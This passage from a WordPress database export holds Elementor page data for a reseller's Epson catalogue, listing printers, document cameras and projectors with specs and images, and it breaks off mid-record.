]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6e2f23c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1be2016\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ccccf17\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>DOCUMENT CAMERAS<\\/h3><p><strong>Document Camera ELPDC21\\u00a0<\\/strong><img src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Document-Camera-ELPDC21.jpg\\\" alt=\\\"\\\" width=\\\"206\\\" height=\\\"137\\\" \\/><\\/p><p>Cut through the hassle, and get straight to your presentation. Epsons series of document cameras not only captures details with Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(7776,3454,'_elementor_version','2.5.14'),(7779,3455,'_wp_page_template','template-fullwidth.php'),(7780,3455,'_elementor_edit_mode','builder'),(7781,3455,'_elementor_template_type','post'),(7782,3455,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h2>Printers for Work<\\/h2><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Enterprise WF-C17590\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d99a531\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"51d6ae3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce Pro WF-C5290\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c9f78e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-100\\u00a0<\\/strong><\\/h4><p><img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"96730a6\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":49,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"addc0f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><span style=\\\"text-align: left; color: #7a7a7a; font-family: Roboto, sans-serif; font-weight: 400; font-size: 0.875rem;\\\">[maxbutton id=\\\"12\\\" ]<\\/span><\\/h4>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson WorkForce WF-7711<\\/strong><\\/h4>\\n<img class=\\\"wp-image-2420 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><br>\\n\\nChange the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.\\n<ul>\\n \\t<li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li>\\n \\t<li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li>\\n \\t<li>Duplex printing up to A3 size<\\/li>\\n \\t<li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li>\\n \\t<li>4.3\\u201d Colour LCD Touch Panel<\\/li>\\n \\t<li>Print, Scan, Copy Fax with ADF<\\/li>\\n<\\/ul>\\n<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c71ec36\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson EcoTank L3150<\\/strong><\\/h4><p><img class=\\\"wp-image-2421 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson L120 Printer\\u00a0<\\/strong><br \\/><br \\/><img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/h4><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9109035\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":166,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"140f583\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div style=\\\"text-align: center;\\\">[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>Epson M1100 Printer<\\/strong><\\/h4><p><img class=\\\"wp-image-2423 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e74569a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":78,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"e157d4e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div><center>[maxbutton id=\\\"12\\\" ]<\\/center><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson AcuLaser C9300N<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0<strong>Epson WorkForce AL-M320DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson WorkForce AL-M8100DN\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-H6000IV\\u00a0<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T88V-i\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson TM-T70II\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L1800 A3 Photo Ink Tank Printer<\\/strong><\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L850 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson L805 Printer\\u00a0<\\/strong><img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2055<\\/strong><\\/p><p><img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-2142W<\\/strong>\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Epson EB-L500W\\u00a0<\\/strong><img class=\\\"wp-image-2436 aligncenter\\\" 